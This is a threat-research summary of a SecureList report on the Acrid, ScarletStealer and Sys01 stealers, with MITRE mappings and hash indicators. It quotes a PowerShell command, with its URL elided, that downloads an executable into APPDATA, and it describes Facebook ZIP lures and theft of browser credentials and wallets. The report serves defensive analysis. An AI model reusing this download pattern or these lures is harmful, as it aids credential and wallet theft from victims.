Threat Research

Stealers, stealers and more stealers

SecureList

Stealers—Acrid, ScarletStealer and Sys01—are examined with notes on their evolution, capabilities and distribution. The report highlights techniques such as Heaven’s Gate for 32-bit apps to access 64-bit space, a Facebook-based ZIP lure, and multi-stage payload chains used to steal browser data and crypto wallets. #Acrid #ScarletStealer #Sys01 #Penguish #HeavensGate #Facebook #Algeria #Brazil #Turkey #Indonesia

Keypoints

  • Acrid is a new stealer using the 32-bit Heaven’s Gate technique to access 64-bit space, enabling bypass of some security controls.
  • ScarletStealer is unusual in that most of its stealing functionality is in other binaries downloaded by ScarletStealer, including signed executables.
  • The ScarletStealer download chain includes binaries like metaver_.exe and meta.exe, with most binaries digitally signed.
  • Sys01 (Album Stealer) evolved from a C# stealer to a PHP/C# hybrid payload, using a multi-stage infection chain delivered via ZIP archives.
  • Infection vectors rely on convincing social-engineering via Facebook pages, distributing malicious ZIPs disguised as adult content.
  • Victims span globally, with Algeria accounting for a notable portion of infections; the actors favor .top domains in their infrastructure.

MITRE Techniques

  • [T1041] Exfiltration Over C2 Channel – Collected data is zipped and sent to the C2. “Collected data is zipped and sent to the C2.”
  • [T1059.001] PowerShell – ScarletStealer uses PowerShell to download and execute additional payloads. “powershell.exe -Command “Invoke-WebRequest -Uri ‘https://………exe’ – OutFile $env:APPDATA………exe””
  • [T1105] Ingress Tool Transfer – The downloader workflow includes downloading additional executables via PowerShell. “download the additional executables using the following PowerShell command:”
  • [T1574.002] Hijack Execution Flow: DLL Side-loading – Sys01 sideloads a malicious DLL (WDSync.dll) via a legitimate binary. “the archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll.”
  • [T1555.003] Credentials from Web Browsers – Stealer functionality includes stealing browser data (cookies, passwords, login data, credit card information, etc.). “Stealing browser data (cookies, passwords, login data, credit card information, etc.).”
  • [T1566.001] Phishing: Spearphishing Attachment – Infection vector relies on a malicious ZIP archive disguised as an adult video via a Facebook page. “Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page”

Indicators of Compromise

  • [Hash] Acrid IOCs – abceb35cf20f22fd8a6569a876e702cb, 2b71c81c48625099b18922ff7bebbf51 and 1 more hash
  • [Hash] ScarletStealer IOCs – 1d3c3869d682fbd0ae3151b419984771, c0cf3d6d40a3038966f2a4f5bfe2b7a7 and 1 more hash
  • [Hash] Sys01 IOCs – 0x6e2b16cc41de627eb7ddcd468a037761, 0x21df3a69540c6618cfbdaf84fc71031c and 1 more hash

Read more: https://securelist.com/crimeware-report-stealers/112633/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint